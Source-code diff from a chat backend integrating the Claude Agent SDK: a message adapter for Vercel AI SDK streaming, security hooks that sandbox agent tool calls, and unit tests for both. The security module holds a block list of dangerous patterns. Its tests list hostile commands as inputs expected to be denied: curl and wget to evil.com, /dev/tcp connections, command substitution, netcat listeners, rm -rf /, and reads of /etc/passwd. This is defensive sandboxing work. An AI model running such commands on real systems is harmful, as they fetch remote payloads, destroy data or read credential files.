result = await handler(tool_input)
# Safely extract output - handle empty or missing content
content = result.get("content") or []
if content and isinstance(content, list) and len(content) > 0:
first_item = content[0]
output = first_item.get("text", "") if isinstance(first_item, dict) else ""
else:
output = ""
is_error = result.get("isError", False)
return output, is_error
except Exception as e:
return f"Error: {str(e)}", True

View File

@@ -0,0 +1,212 @@
"""Response adapter for converting Claude Agent SDK messages to Vercel AI SDK format.
This module provides the adapter layer that converts streaming messages from
the Claude Agent SDK into the Vercel AI SDK UI Stream Protocol format that
the frontend expects.
"""
import json
import logging
import uuid
from claude_agent_sdk import (
AssistantMessage,
Message,
ResultMessage,
SystemMessage,
TextBlock,
ToolResultBlock,
ToolUseBlock,
UserMessage,
)
from backend.api.features.chat.response_model import (
StreamBaseResponse,
StreamError,
StreamFinish,
StreamFinishStep,
StreamStart,
StreamStartStep,
StreamTextDelta,
StreamTextEnd,
StreamTextStart,
StreamToolInputAvailable,
StreamToolInputStart,
StreamToolOutputAvailable,
StreamUsage,
)
from backend.api.features.chat.sdk.tool_adapter import (
MCP_TOOL_PREFIX,
pop_pending_tool_output,
)
logger = logging.getLogger(__name__)
class SDKResponseAdapter:
"""Adapter for converting Claude Agent SDK messages to Vercel AI SDK format.
This class maintains state during a streaming session to properly track
text blocks, tool calls, and message lifecycle.
"""
def __init__(self, message_id: str | None = None):
self.message_id = message_id or str(uuid.uuid4())
self.text_block_id = str(uuid.uuid4())
self.has_started_text = False
self.has_ended_text = False
self.current_tool_calls: dict[str, dict[str, str]] = {}
self.task_id: str | None = None
self.step_open = False
def set_task_id(self, task_id: str) -> None:
"""Set the task ID for reconnection support."""
self.task_id = task_id
def convert_message(self, sdk_message: Message) -> list[StreamBaseResponse]:
"""Convert a single SDK message to Vercel AI SDK format."""
responses: list[StreamBaseResponse] = []
if isinstance(sdk_message, SystemMessage):
if sdk_message.subtype == "init":
responses.append(
StreamStart(messageId=self.message_id, taskId=self.task_id)
)
# Open the first step (matches non-SDK: StreamStart then StreamStartStep)
responses.append(StreamStartStep())
self.step_open = True
elif isinstance(sdk_message, AssistantMessage):
# After tool results, the SDK sends a new AssistantMessage for the
# next LLM turn. Open a new step if the previous one was closed.
if not self.step_open:
responses.append(StreamStartStep())
self.step_open = True
for block in sdk_message.content:
if isinstance(block, TextBlock):
if block.text:
self._ensure_text_started(responses)
responses.append(
StreamTextDelta(id=self.text_block_id, delta=block.text)
)
elif isinstance(block, ToolUseBlock):
self._end_text_if_open(responses)
# Strip MCP prefix so frontend sees "find_block"
# instead of "mcp__copilot__find_block".
tool_name = block.name.removeprefix(MCP_TOOL_PREFIX)
responses.append(
StreamToolInputStart(toolCallId=block.id, toolName=tool_name)
)
responses.append(
StreamToolInputAvailable(
toolCallId=block.id,
toolName=tool_name,
input=block.input,
)
)
self.current_tool_calls[block.id] = {"name": tool_name}
elif isinstance(sdk_message, UserMessage):
# UserMessage carries tool results back from tool execution.
content = sdk_message.content
blocks = content if isinstance(content, list) else []
for block in blocks:
if isinstance(block, ToolResultBlock) and block.tool_use_id:
tool_info = self.current_tool_calls.get(block.tool_use_id, {})
tool_name = tool_info.get("name", "unknown")
# Prefer the stashed full output over the SDK's
# (potentially truncated) ToolResultBlock content.
# The SDK truncates large results, writing them to disk,
# which breaks frontend widget parsing.
output = pop_pending_tool_output(tool_name) or (
_extract_tool_output(block.content)
)
responses.append(
StreamToolOutputAvailable(
toolCallId=block.tool_use_id,
toolName=tool_name,
output=output,
success=not (block.is_error or False),
)
)
# Close the current step after tool results — the next
# AssistantMessage will open a new step for the continuation.
if self.step_open:
responses.append(StreamFinishStep())
self.step_open = False
elif isinstance(sdk_message, ResultMessage):
self._end_text_if_open(responses)
# Close the step before finishing.
if self.step_open:
responses.append(StreamFinishStep())
self.step_open = False
# Emit token usage if the SDK reported it
usage = getattr(sdk_message, "usage", None) or {}
if usage:
input_tokens = usage.get("input_tokens", 0)
output_tokens = usage.get("output_tokens", 0)
responses.append(
StreamUsage(
promptTokens=input_tokens,
completionTokens=output_tokens,
totalTokens=input_tokens + output_tokens,
)
)
if sdk_message.subtype == "success":
responses.append(StreamFinish())
elif sdk_message.subtype in ("error", "error_during_execution"):
error_msg = getattr(sdk_message, "result", None) or "Unknown error"
responses.append(
StreamError(errorText=str(error_msg), code="sdk_error")
)
responses.append(StreamFinish())
else:
logger.debug(f"Unhandled SDK message type: {type(sdk_message).__name__}")
return responses
def _ensure_text_started(self, responses: list[StreamBaseResponse]) -> None:
"""Start (or restart) a text block if needed."""
if not self.has_started_text or self.has_ended_text:
if self.has_ended_text:
self.text_block_id = str(uuid.uuid4())
self.has_ended_text = False
responses.append(StreamTextStart(id=self.text_block_id))
self.has_started_text = True
def _end_text_if_open(self, responses: list[StreamBaseResponse]) -> None:
"""End the current text block if one is open."""
if self.has_started_text and not self.has_ended_text:
responses.append(StreamTextEnd(id=self.text_block_id))
self.has_ended_text = True
def _extract_tool_output(content: str | list[dict[str, str]] | None) -> str:
"""Extract a string output from a ToolResultBlock's content field."""
if isinstance(content, str):
return content
if isinstance(content, list):
parts = [item.get("text", "") for item in content if item.get("type") == "text"]
if parts:
return "".join(parts)
try:
return json.dumps(content)
except (TypeError, ValueError):
return str(content)
if content is None:
return ""
try:
return json.dumps(content)
except (TypeError, ValueError):
return str(content)

View File

@@ -0,0 +1,366 @@
"""Unit tests for the SDK response adapter."""
from claude_agent_sdk import (
AssistantMessage,
ResultMessage,
SystemMessage,
TextBlock,
ToolResultBlock,
ToolUseBlock,
UserMessage,
)
from backend.api.features.chat.response_model import (
StreamBaseResponse,
StreamError,
StreamFinish,
StreamFinishStep,
StreamStart,
StreamStartStep,
StreamTextDelta,
StreamTextEnd,
StreamTextStart,
StreamToolInputAvailable,
StreamToolInputStart,
StreamToolOutputAvailable,
)
from .response_adapter import SDKResponseAdapter
from .tool_adapter import MCP_TOOL_PREFIX
def _adapter() -> SDKResponseAdapter:
a = SDKResponseAdapter(message_id="msg-1")
a.set_task_id("task-1")
return a
# -- SystemMessage -----------------------------------------------------------
def test_system_init_emits_start_and_step():
adapter = _adapter()
results = adapter.convert_message(SystemMessage(subtype="init", data={}))
assert len(results) == 2
assert isinstance(results[0], StreamStart)
assert results[0].messageId == "msg-1"
assert results[0].taskId == "task-1"
assert isinstance(results[1], StreamStartStep)
def test_system_non_init_emits_nothing():
adapter = _adapter()
results = adapter.convert_message(SystemMessage(subtype="other", data={}))
assert results == []
# -- AssistantMessage with TextBlock -----------------------------------------
def test_text_block_emits_step_start_and_delta():
adapter = _adapter()
msg = AssistantMessage(content=[TextBlock(text="hello")], model="test")
results = adapter.convert_message(msg)
assert len(results) == 3
assert isinstance(results[0], StreamStartStep)
assert isinstance(results[1], StreamTextStart)
assert isinstance(results[2], StreamTextDelta)
assert results[2].delta == "hello"
def test_empty_text_block_emits_only_step():
adapter = _adapter()
msg = AssistantMessage(content=[TextBlock(text="")], model="test")
results = adapter.convert_message(msg)
# Empty text skipped, but step still opens
assert len(results) == 1
assert isinstance(results[0], StreamStartStep)
def test_multiple_text_deltas_reuse_block_id():
adapter = _adapter()
msg1 = AssistantMessage(content=[TextBlock(text="a")], model="test")
msg2 = AssistantMessage(content=[TextBlock(text="b")], model="test")
r1 = adapter.convert_message(msg1)
r2 = adapter.convert_message(msg2)
# First gets step+start+delta, second only delta (block & step already started)
assert len(r1) == 3
assert isinstance(r1[0], StreamStartStep)
assert isinstance(r1[1], StreamTextStart)
assert len(r2) == 1
assert isinstance(r2[0], StreamTextDelta)
assert r1[1].id == r2[0].id # same block ID
# -- AssistantMessage with ToolUseBlock --------------------------------------
def test_tool_use_emits_input_start_and_available():
"""Tool names arrive with MCP prefix and should be stripped for the frontend."""
adapter = _adapter()
msg = AssistantMessage(
content=[
ToolUseBlock(
id="tool-1",
name=f"{MCP_TOOL_PREFIX}find_agent",
input={"q": "x"},
)
],
model="test",
)
results = adapter.convert_message(msg)
assert len(results) == 3
assert isinstance(results[0], StreamStartStep)
assert isinstance(results[1], StreamToolInputStart)
assert results[1].toolCallId == "tool-1"
assert results[1].toolName == "find_agent" # prefix stripped
assert isinstance(results[2], StreamToolInputAvailable)
assert results[2].toolName == "find_agent" # prefix stripped
assert results[2].input == {"q": "x"}
def test_text_then_tool_ends_text_block():
adapter = _adapter()
text_msg = AssistantMessage(content=[TextBlock(text="thinking...")], model="test")
tool_msg = AssistantMessage(
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
model="test",
)
adapter.convert_message(text_msg) # opens step + text
results = adapter.convert_message(tool_msg)
# Step already open, so: TextEnd, ToolInputStart, ToolInputAvailable
assert len(results) == 3
assert isinstance(results[0], StreamTextEnd)
assert isinstance(results[1], StreamToolInputStart)
# -- UserMessage with ToolResultBlock ----------------------------------------
def test_tool_result_emits_output_and_finish_step():
adapter = _adapter()
# First register the tool call (opens step) — SDK sends prefixed name
tool_msg = AssistantMessage(
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}find_agent", input={})],
model="test",
)
adapter.convert_message(tool_msg)
# Now send tool result
result_msg = UserMessage(
content=[ToolResultBlock(tool_use_id="t1", content="found 3 agents")]
)
results = adapter.convert_message(result_msg)
assert len(results) == 2
assert isinstance(results[0], StreamToolOutputAvailable)
assert results[0].toolCallId == "t1"
assert results[0].toolName == "find_agent" # prefix stripped
assert results[0].output == "found 3 agents"
assert results[0].success is True
assert isinstance(results[1], StreamFinishStep)
def test_tool_result_error():
adapter = _adapter()
adapter.convert_message(
AssistantMessage(
content=[
ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}run_agent", input={})
],
model="test",
)
)
result_msg = UserMessage(
content=[ToolResultBlock(tool_use_id="t1", content="timeout", is_error=True)]
)
results = adapter.convert_message(result_msg)
assert isinstance(results[0], StreamToolOutputAvailable)
assert results[0].success is False
assert isinstance(results[1], StreamFinishStep)
def test_tool_result_list_content():
adapter = _adapter()
adapter.convert_message(
AssistantMessage(
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
model="test",
)
)
result_msg = UserMessage(
content=[
ToolResultBlock(
tool_use_id="t1",
content=[
{"type": "text", "text": "line1"},
{"type": "text", "text": "line2"},
],
)
]
)
results = adapter.convert_message(result_msg)
assert isinstance(results[0], StreamToolOutputAvailable)
assert results[0].output == "line1line2"
assert isinstance(results[1], StreamFinishStep)
def test_string_user_message_ignored():
"""A plain string UserMessage (not tool results) produces no output."""
adapter = _adapter()
results = adapter.convert_message(UserMessage(content="hello"))
assert results == []
# -- ResultMessage -----------------------------------------------------------
def test_result_success_emits_finish_step_and_finish():
adapter = _adapter()
# Start some text first (opens step)
adapter.convert_message(
AssistantMessage(content=[TextBlock(text="done")], model="test")
)
msg = ResultMessage(
subtype="success",
duration_ms=100,
duration_api_ms=50,
is_error=False,
num_turns=1,
session_id="s1",
)
results = adapter.convert_message(msg)
# TextEnd + FinishStep + StreamFinish
assert len(results) == 3
assert isinstance(results[0], StreamTextEnd)
assert isinstance(results[1], StreamFinishStep)
assert isinstance(results[2], StreamFinish)
def test_result_error_emits_error_and_finish():
adapter = _adapter()
msg = ResultMessage(
subtype="error",
duration_ms=100,
duration_api_ms=50,
is_error=True,
num_turns=0,
session_id="s1",
result="API rate limited",
)
results = adapter.convert_message(msg)
# No step was open, so no FinishStep — just Error + Finish
assert len(results) == 2
assert isinstance(results[0], StreamError)
assert "API rate limited" in results[0].errorText
assert isinstance(results[1], StreamFinish)
# -- Text after tools (new block ID) ----------------------------------------
def test_text_after_tool_gets_new_block_id():
adapter = _adapter()
# Text -> Tool -> ToolResult -> Text should get a new text block ID and step
adapter.convert_message(
AssistantMessage(content=[TextBlock(text="before")], model="test")
)
adapter.convert_message(
AssistantMessage(
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
model="test",
)
)
# Send tool result (closes step)
adapter.convert_message(
UserMessage(content=[ToolResultBlock(tool_use_id="t1", content="ok")])
)
results = adapter.convert_message(
AssistantMessage(content=[TextBlock(text="after")], model="test")
)
# Should get StreamStartStep (new step) + StreamTextStart (new block) + StreamTextDelta
assert len(results) == 3
assert isinstance(results[0], StreamStartStep)
assert isinstance(results[1], StreamTextStart)
assert isinstance(results[2], StreamTextDelta)
assert results[2].delta == "after"
# -- Full conversation flow --------------------------------------------------
def test_full_conversation_flow():
"""Simulate a complete conversation: init -> text -> tool -> result -> text -> finish."""
adapter = _adapter()
all_responses: list[StreamBaseResponse] = []
# 1. Init
all_responses.extend(
adapter.convert_message(SystemMessage(subtype="init", data={}))
)
# 2. Assistant text
all_responses.extend(
adapter.convert_message(
AssistantMessage(content=[TextBlock(text="Let me search")], model="test")
)
)
# 3. Tool use
all_responses.extend(
adapter.convert_message(
AssistantMessage(
content=[
ToolUseBlock(
id="t1",
name=f"{MCP_TOOL_PREFIX}find_agent",
input={"query": "email"},
)
],
model="test",
)
)
)
# 4. Tool result
all_responses.extend(
adapter.convert_message(
UserMessage(
content=[ToolResultBlock(tool_use_id="t1", content="Found 2 agents")]
)
)
)
# 5. More text
all_responses.extend(
adapter.convert_message(
AssistantMessage(content=[TextBlock(text="I found 2")], model="test")
)
)
# 6. Result
all_responses.extend(
adapter.convert_message(
ResultMessage(
subtype="success",
duration_ms=500,
duration_api_ms=400,
is_error=False,
num_turns=2,
session_id="s1",
)
)
)
types = [type(r).__name__ for r in all_responses]
assert types == [
"StreamStart",
"StreamStartStep", # step 1: text + tool call
"StreamTextStart",
"StreamTextDelta", # "Let me search"
"StreamTextEnd", # closed before tool
"StreamToolInputStart",
"StreamToolInputAvailable",
"StreamToolOutputAvailable", # tool result
"StreamFinishStep", # step 1 closed after tool result
"StreamStartStep", # step 2: continuation text
"StreamTextStart", # new block after tool
"StreamTextDelta", # "I found 2"
"StreamTextEnd", # closed by result
"StreamFinishStep", # step 2 closed
"StreamFinish",
]

View File

@@ -0,0 +1,393 @@
"""Security hooks for Claude Agent SDK integration.
This module provides security hooks that validate tool calls before execution,
ensuring multi-user isolation and preventing unauthorized operations.
"""
import json
import logging
import os
import re
import shlex
from typing import Any, cast
from backend.api.features.chat.sdk.tool_adapter import MCP_TOOL_PREFIX
logger = logging.getLogger(__name__)
# Tools that are blocked entirely (CLI/system access)
BLOCKED_TOOLS = {
"bash",
"shell",
"exec",
"terminal",
"command",
}
# Safe read-only commands allowed in the sandboxed Bash tool.
# These are data-processing / inspection utilities — no writes, no network.
ALLOWED_BASH_COMMANDS = {
# JSON / structured data
"jq",
# Text processing
"grep",
"egrep",
"fgrep",
"rg",
"head",
"tail",
"cat",
"wc",
"sort",
"uniq",
"cut",
"tr",
"sed",
"awk",
"column",
"fold",
"fmt",
"nl",
"paste",
"rev",
# File inspection (read-only)
"find",
"ls",
"file",
"stat",
"du",
"tree",
"basename",
"dirname",
"realpath",
# Utilities
"echo",
"printf",
"date",
"true",
"false",
"xargs",
"tee",
# Comparison / encoding
"diff",
"comm",
"base64",
"md5sum",
"sha256sum",
}
# Tools allowed only when their path argument stays within the SDK workspace.
# The SDK uses these to handle oversized tool results (writes to tool-results/
# files, then reads them back) and for workspace file operations.
WORKSPACE_SCOPED_TOOLS = {"Read", "Write", "Edit", "Glob", "Grep"}
# Tools that get sandboxed Bash validation (command allowlist + workspace paths).
SANDBOXED_BASH_TOOLS = {"Bash"}
# Dangerous patterns in tool inputs
DANGEROUS_PATTERNS = [
r"sudo",
r"rm\s+-rf",
r"dd\s+if=",
r"/etc/passwd",
r"/etc/shadow",
r"chmod\s+777",
r"curl\s+.*\|.*sh",
r"wget\s+.*\|.*sh",
r"eval\s*\(",
r"exec\s*\(",
r"__import__",
r"os\.system",
r"subprocess",
]
def _deny(reason: str) -> dict[str, Any]:
"""Return a hook denial response."""
return {
"hookSpecificOutput": {
"hookEventName": "PreToolUse",
"permissionDecision": "deny",
"permissionDecisionReason": reason,
}
}
def _validate_workspace_path(
tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None
) -> dict[str, Any]:
"""Validate that a workspace-scoped tool only accesses allowed paths.
Allowed directories:
- The SDK working directory (``/tmp/copilot-<session>/``)
- The SDK tool-results directory (``~/.claude/projects/…/tool-results/``)
"""
path = tool_input.get("file_path") or tool_input.get("path") or ""
if not path:
# Glob/Grep without a path default to cwd which is already sandboxed
return {}
resolved = os.path.normpath(os.path.expanduser(path))
# Allow access within the SDK working directory
if sdk_cwd:
norm_cwd = os.path.normpath(sdk_cwd)
if resolved.startswith(norm_cwd + os.sep) or resolved == norm_cwd:
return {}
# Allow access to ~/.claude/projects/*/tool-results/ (big tool results)
claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects"))
if resolved.startswith(claude_dir + os.sep) and "tool-results" in resolved:
return {}
logger.warning(
f"Blocked {tool_name} outside workspace: {path} (resolved={resolved})"
)
return _deny(
f"Tool '{tool_name}' can only access files within the workspace directory."
)
def _validate_bash_command(
tool_input: dict[str, Any], sdk_cwd: str | None
) -> dict[str, Any]:
"""Validate a Bash command against the allowlist of safe commands.
Only read-only data-processing commands are allowed (jq, grep, head, etc.).
Blocks command substitution, output redirection, and disallowed executables.
Uses ``shlex.split`` to properly handle quoted strings (e.g. jq filters
containing ``|`` won't be mistaken for shell pipes).
"""
command = tool_input.get("command", "")
if not command or not isinstance(command, str):
return _deny("Bash command is empty.")
# Block command substitution — can smuggle arbitrary commands
if "$(" in command or "`" in command:
return _deny("Command substitution ($() or ``) is not allowed in Bash.")
# Block output redirection — Bash should be read-only
if re.search(r"(?<!\d)>{1,2}\s", command):
return _deny("Output redirection (> or >>) is not allowed in Bash.")
# Block /dev/ access (e.g., /dev/tcp for network)
if "/dev/" in command:
return _deny("Access to /dev/ is not allowed in Bash.")
# Tokenize with shlex (respects quotes), then extract command names.
# shlex preserves shell operators like | ; && || as separate tokens.
try:
tokens = shlex.split(command)
except ValueError:
return _deny("Malformed command (unmatched quotes).")
# Walk tokens: the first non-assignment token after a pipe/separator is a command.
expect_command = True
for token in tokens:
if token in ("|", "||", "&&", ";"):
expect_command = True
continue
if expect_command:
# Skip env var assignments (VAR=value)
if "=" in token and not token.startswith("-"):
continue
cmd_name = os.path.basename(token)
if cmd_name not in ALLOWED_BASH_COMMANDS:
allowed = ", ".join(sorted(ALLOWED_BASH_COMMANDS))
logger.warning(f"Blocked Bash command: {cmd_name}")
return _deny(
f"Command '{cmd_name}' is not allowed. "
f"Allowed commands: {allowed}"
)
expect_command = False
# Validate absolute file paths stay within workspace
if sdk_cwd:
norm_cwd = os.path.normpath(sdk_cwd)
claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects"))
for token in tokens:
if not token.startswith("/"):
continue
resolved = os.path.normpath(token)
if resolved.startswith(norm_cwd + os.sep) or resolved == norm_cwd:
continue
if resolved.startswith(claude_dir + os.sep) and "tool-results" in resolved:
continue
logger.warning(f"Blocked Bash path outside workspace: {token}")
return _deny(
f"Bash can only access files within the workspace directory. "
f"Path '{token}' is outside the workspace."
)
return {}
def _validate_tool_access(
tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None = None
) -> dict[str, Any]:
"""Validate that a tool call is allowed.
Returns:
Empty dict to allow, or dict with hookSpecificOutput to deny
"""
# Block forbidden tools
if tool_name in BLOCKED_TOOLS:
logger.warning(f"Blocked tool access attempt: {tool_name}")
return _deny(
f"Tool '{tool_name}' is not available. "
"Use the CoPilot-specific tools instead."
)
# Sandboxed Bash: only allowlisted commands, workspace-scoped paths
if tool_name in SANDBOXED_BASH_TOOLS:
return _validate_bash_command(tool_input, sdk_cwd)
# Workspace-scoped tools: allowed only within the SDK workspace directory
if tool_name in WORKSPACE_SCOPED_TOOLS:
return _validate_workspace_path(tool_name, tool_input, sdk_cwd)
# Check for dangerous patterns in tool input
# Use json.dumps for predictable format (str() produces Python repr)
input_str = json.dumps(tool_input) if tool_input else ""
for pattern in DANGEROUS_PATTERNS:
if re.search(pattern, input_str, re.IGNORECASE):
logger.warning(
f"Blocked dangerous pattern in tool input: {pattern} in {tool_name}"
)
return _deny("Input contains blocked pattern")
return {}
def _validate_user_isolation(
tool_name: str, tool_input: dict[str, Any], user_id: str | None
) -> dict[str, Any]:
"""Validate that tool calls respect user isolation."""
# For workspace file tools, ensure path doesn't escape
if "workspace" in tool_name.lower():
path = tool_input.get("path", "") or tool_input.get("file_path", "")
if path:
# Check for path traversal
if ".." in path or path.startswith("/"):
logger.warning(
f"Blocked path traversal attempt: {path} by user {user_id}"
)
return {
"hookSpecificOutput": {
"hookEventName": "PreToolUse",
"permissionDecision": "deny",
"permissionDecisionReason": "Path traversal not allowed",
}
}
return {}
def create_security_hooks(
user_id: str | None, sdk_cwd: str | None = None
) -> dict[str, Any]:
"""Create the security hooks configuration for Claude Agent SDK.
Includes security validation and observability hooks:
- PreToolUse: Security validation before tool execution
- PostToolUse: Log successful tool executions
- PostToolUseFailure: Log and handle failed tool executions
- PreCompact: Log context compaction events (SDK handles compaction automatically)
Args:
user_id: Current user ID for isolation validation
sdk_cwd: SDK working directory for workspace-scoped tool validation
Returns:
Hooks configuration dict for ClaudeAgentOptions
"""
try:
from claude_agent_sdk import HookMatcher
from claude_agent_sdk.types import HookContext, HookInput, SyncHookJSONOutput
async def pre_tool_use_hook(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Combined pre-tool-use validation hook."""
_ = context # unused but required by signature
tool_name = cast(str, input_data.get("tool_name", ""))
tool_input = cast(dict[str, Any], input_data.get("tool_input", {}))
# Strip MCP prefix for consistent validation
is_copilot_tool = tool_name.startswith(MCP_TOOL_PREFIX)
clean_name = tool_name.removeprefix(MCP_TOOL_PREFIX)
# Only block non-CoPilot tools; our MCP-registered tools
# (including Read for oversized results) are already sandboxed.
if not is_copilot_tool:
result = _validate_tool_access(clean_name, tool_input, sdk_cwd)
if result:
return cast(SyncHookJSONOutput, result)
# Validate user isolation
result = _validate_user_isolation(clean_name, tool_input, user_id)
if result:
return cast(SyncHookJSONOutput, result)
logger.debug(f"[SDK] Tool start: {tool_name}, user={user_id}")
return cast(SyncHookJSONOutput, {})
async def post_tool_use_hook(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Log successful tool executions for observability."""
_ = context
tool_name = cast(str, input_data.get("tool_name", ""))
logger.debug(f"[SDK] Tool success: {tool_name}, tool_use_id={tool_use_id}")
return cast(SyncHookJSONOutput, {})
async def post_tool_failure_hook(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Log failed tool executions for debugging."""
_ = context
tool_name = cast(str, input_data.get("tool_name", ""))
error = input_data.get("error", "Unknown error")
logger.warning(
f"[SDK] Tool failed: {tool_name}, error={error}, "
f"user={user_id}, tool_use_id={tool_use_id}"
)
return cast(SyncHookJSONOutput, {})
async def pre_compact_hook(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Log when SDK triggers context compaction.
The SDK automatically compacts conversation history when it grows too large.
This hook provides visibility into when compaction happens.
"""
_ = context, tool_use_id
trigger = input_data.get("trigger", "auto")
logger.info(
f"[SDK] Context compaction triggered: {trigger}, user={user_id}"
)
return cast(SyncHookJSONOutput, {})
return {
"PreToolUse": [HookMatcher(matcher="*", hooks=[pre_tool_use_hook])],
"PostToolUse": [HookMatcher(matcher="*", hooks=[post_tool_use_hook])],
"PostToolUseFailure": [
HookMatcher(matcher="*", hooks=[post_tool_failure_hook])
],
"PreCompact": [HookMatcher(matcher="*", hooks=[pre_compact_hook])],
}
except ImportError:
# Fallback for when SDK isn't available - return empty hooks
logger.warning("claude-agent-sdk not available, security hooks disabled")
return {}

View File

@@ -0,0 +1,258 @@
"""Unit tests for SDK security hooks."""
import os
from .security_hooks import _validate_tool_access, _validate_user_isolation
SDK_CWD = "/tmp/copilot-abc123"
def _is_denied(result: dict) -> bool:
hook = result.get("hookSpecificOutput", {})
return hook.get("permissionDecision") == "deny"
# -- Blocked tools -----------------------------------------------------------
def test_blocked_tools_denied():
for tool in ("bash", "shell", "exec", "terminal", "command"):
result = _validate_tool_access(tool, {})
assert _is_denied(result), f"{tool} should be blocked"
def test_unknown_tool_allowed():
result = _validate_tool_access("SomeCustomTool", {})
assert result == {}
# -- Workspace-scoped tools --------------------------------------------------
def test_read_within_workspace_allowed():
result = _validate_tool_access(
"Read", {"file_path": f"{SDK_CWD}/file.txt"}, sdk_cwd=SDK_CWD
)
assert result == {}
def test_write_within_workspace_allowed():
result = _validate_tool_access(
"Write", {"file_path": f"{SDK_CWD}/output.json"}, sdk_cwd=SDK_CWD
)
assert result == {}
def test_edit_within_workspace_allowed():
result = _validate_tool_access(
"Edit", {"file_path": f"{SDK_CWD}/src/main.py"}, sdk_cwd=SDK_CWD
)
assert result == {}
def test_glob_within_workspace_allowed():
result = _validate_tool_access("Glob", {"path": f"{SDK_CWD}/src"}, sdk_cwd=SDK_CWD)
assert result == {}
def test_grep_within_workspace_allowed():
result = _validate_tool_access("Grep", {"path": f"{SDK_CWD}/src"}, sdk_cwd=SDK_CWD)
assert result == {}
def test_read_outside_workspace_denied():
result = _validate_tool_access(
"Read", {"file_path": "/etc/passwd"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_write_outside_workspace_denied():
result = _validate_tool_access(
"Write", {"file_path": "/home/user/secrets.txt"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_traversal_attack_denied():
result = _validate_tool_access(
"Read",
{"file_path": f"{SDK_CWD}/../../etc/passwd"},
sdk_cwd=SDK_CWD,
)
assert _is_denied(result)
def test_no_path_allowed():
"""Glob/Grep without a path argument defaults to cwd — should pass."""
result = _validate_tool_access("Glob", {}, sdk_cwd=SDK_CWD)
assert result == {}
def test_read_no_cwd_denies_absolute():
"""If no sdk_cwd is set, absolute paths are denied."""
result = _validate_tool_access("Read", {"file_path": "/tmp/anything"})
assert _is_denied(result)
# -- Tool-results directory --------------------------------------------------
def test_read_tool_results_allowed():
home = os.path.expanduser("~")
path = f"{home}/.claude/projects/-tmp-copilot-abc123/tool-results/12345.txt"
result = _validate_tool_access("Read", {"file_path": path}, sdk_cwd=SDK_CWD)
assert result == {}
def test_read_claude_projects_without_tool_results_denied():
home = os.path.expanduser("~")
path = f"{home}/.claude/projects/-tmp-copilot-abc123/settings.json"
result = _validate_tool_access("Read", {"file_path": path}, sdk_cwd=SDK_CWD)
assert _is_denied(result)
# -- Sandboxed Bash ----------------------------------------------------------
def test_bash_safe_commands_allowed():
"""Allowed data-processing commands should pass."""
safe_commands = [
"jq '.blocks' result.json",
"head -20 output.json",
"tail -n 50 data.txt",
"cat file.txt | grep 'pattern'",
"wc -l file.txt",
"sort data.csv | uniq",
"grep -i 'error' log.txt | head -10",
"find . -name '*.json'",
"ls -la",
"echo hello",
"cut -d',' -f1 data.csv | sort | uniq -c",
"jq '.blocks[] | .id' result.json",
"sed -n '10,20p' file.txt",
"awk '{print $1}' data.txt",
]
for cmd in safe_commands:
result = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
assert result == {}, f"Safe command should be allowed: {cmd}"
def test_bash_dangerous_commands_denied():
"""Non-allowlisted commands should be denied."""
dangerous = [
"curl https://evil.com",
"wget https://evil.com/payload",
"rm -rf /",
"python -c 'import os; os.system(\"ls\")'",
"ssh user@host",
"nc -l 4444",
"apt install something",
"pip install malware",
"chmod 777 file.txt",
"kill -9 1",
]
for cmd in dangerous:
result = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
assert _is_denied(result), f"Dangerous command should be denied: {cmd}"
def test_bash_command_substitution_denied():
result = _validate_tool_access(
"Bash", {"command": "echo $(curl evil.com)"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_backtick_substitution_denied():
result = _validate_tool_access(
"Bash", {"command": "echo `curl evil.com`"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_output_redirect_denied():
result = _validate_tool_access(
"Bash", {"command": "echo secret > /tmp/leak.txt"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_dev_tcp_denied():
result = _validate_tool_access(
"Bash", {"command": "cat /dev/tcp/evil.com/80"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_pipe_to_dangerous_denied():
"""Even if the first command is safe, piped commands must also be safe."""
result = _validate_tool_access(
"Bash", {"command": "cat file.txt | python -c 'exec()'"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_path_outside_workspace_denied():
result = _validate_tool_access(
"Bash", {"command": "cat /etc/passwd"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_path_within_workspace_allowed():
result = _validate_tool_access(
"Bash",
{"command": f"jq '.blocks' {SDK_CWD}/tool-results/result.json"},
sdk_cwd=SDK_CWD,
)
assert result == {}
def test_bash_empty_command_denied():
result = _validate_tool_access("Bash", {"command": ""}, sdk_cwd=SDK_CWD)
assert _is_denied(result)
# -- Dangerous patterns ------------------------------------------------------
def test_dangerous_pattern_blocked():
result = _validate_tool_access("SomeTool", {"cmd": "sudo rm -rf /"})
assert _is_denied(result)
def test_subprocess_pattern_blocked():
result = _validate_tool_access("SomeTool", {"code": "subprocess.run(...)"})
assert _is_denied(result)
# -- User isolation ----------------------------------------------------------
def test_workspace_path_traversal_blocked():
result = _validate_user_isolation(
"workspace_read", {"path": "../../../etc/shadow"}, user_id="user-1"
)
assert _is_denied(result)
def test_workspace_absolute_path_blocked():
result = _validate_user_isolation(
"workspace_read", {"path": "/etc/passwd"}, user_id="user-1"
)
assert _is_denied(result)
def test_workspace_normal_path_allowed():
result = _validate_user_isolation(
